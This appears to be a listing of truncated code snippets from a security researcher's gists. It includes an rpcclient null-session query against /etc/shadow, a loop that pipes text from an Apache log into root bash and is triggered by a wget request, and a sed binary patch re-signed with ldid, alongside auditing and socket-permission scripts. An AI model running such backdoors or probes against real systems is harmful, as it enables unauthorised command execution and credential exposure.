timb-machine

$ echo netfilegetsec 'IPC$' /etc/shadow | rpcclient -U '%' 10.10.10.3
revision: 1
type: 0x9004: SEC_DESC_DACL_PRESENT SEC_DESC_DACL_PROTECTED SEC_DESC_SELF_RELATIVE 
DACL
	ACL	Num ACEs:	3	revision:	2
	---
	ACE
		type: ACCESS ALLOWED (0) flags: 0x00 
		Specific bits: 0x1ff
		Permissions: 0x1e01ff: SYNCHRONIZE_ACCESS WRITE_OWNER_ACCESS WRITE_DAC_ACCESS READ_CONTROL_ACCESS 

timb-machine

$ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash

$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'

root     10680 10679  0 21:27 pts/1    00:00:00 /bin/bash
root     11125 10680 17 21:27 pts/1    00:00:02 bash

$ ls /proc/11125/fd
total 0
dr-x------ 2 root root  0 Jun 28 21:27 .

timb-machine

#!/bin/sh

generate_file_rule () {
        filepermissions="${1}"
        rulename="${2}"
        while read filename
        do
                printf -- "-w %s -p %s -k %s\n" "${filename}" "${filepermissions}" "${rulename}"
        done
}

timb-machine

#!/usr/bin/perl -w

use strict;
use Data::Dumper;

my %killchainmodel;
my $cvssmetric;
my $metricname;
my $metricscore;
my $phasename;

timb-machine

#!/usr/bin/perl

use Cwd;
use MIME::Base64;

$start = getcwd();
$maxnewpath = 1024;
while (sysread(STDIN, $byte, 1) != 0) {
	$maxpath = 100;
	$string = $byte;

timb-machine

#!/bin/sh
# Not to be confused with https://labs.portcullis.co.uk/tools/unix-socket-scanner/ which does more detailed enumeration but doesn't do permission checks

netstat -an | grep stream | awk '{print $9}' | sort | uniq | egrep -v "vms\/|^$" | while read socketname
do
	if [ -n "$(printf "${socketname}" | grep "^/")" ]
	then
		printf "==\n"
		ls -la "${socketname}"
		if [ -n "$(ls -la "${socketname}" | grep "s.......w. ")" ]

timb-machine

#!/bin/sh

OLDNAME="${1}"
NEWNAME="${2}"

grep -r "${OLDNAME}" . | cut -f 1 -d : | sort | uniq | while read filename
do
	cp "${filename}" "${filename}.old"
	cat "${filename}.old" | sed "s/${OLDNAME}/${NEWNAME}/g" > "${filename}"
	rm "${filename}.old"

timb-machine

#!/bin/sh
# https://osandamalith.wordpress.com

sed -i "" "s/\x00\x30\x93\xe4/\x00\x30\x93\xe5/g;s/\x00\x30\xd3\xe4/\x00\x30\xd3\xe5/g;" "${1}"
ldid -s "${1}"

timb-machine

#include <sys/stat.h> 
#include <fcntl.h>
#include <sys/mman.h>
#include <stdio.h>

int main(int argc, char **argv) {
        int filehandle;
        char *mmapbuffer;
        filehandle = open("sarpedon-000002.vmdk", O_RDWR);
        mmapbuffer = mmap(0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, f, 0);

timb-machine

/*
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the Nth Dimension nor the names of its contributors may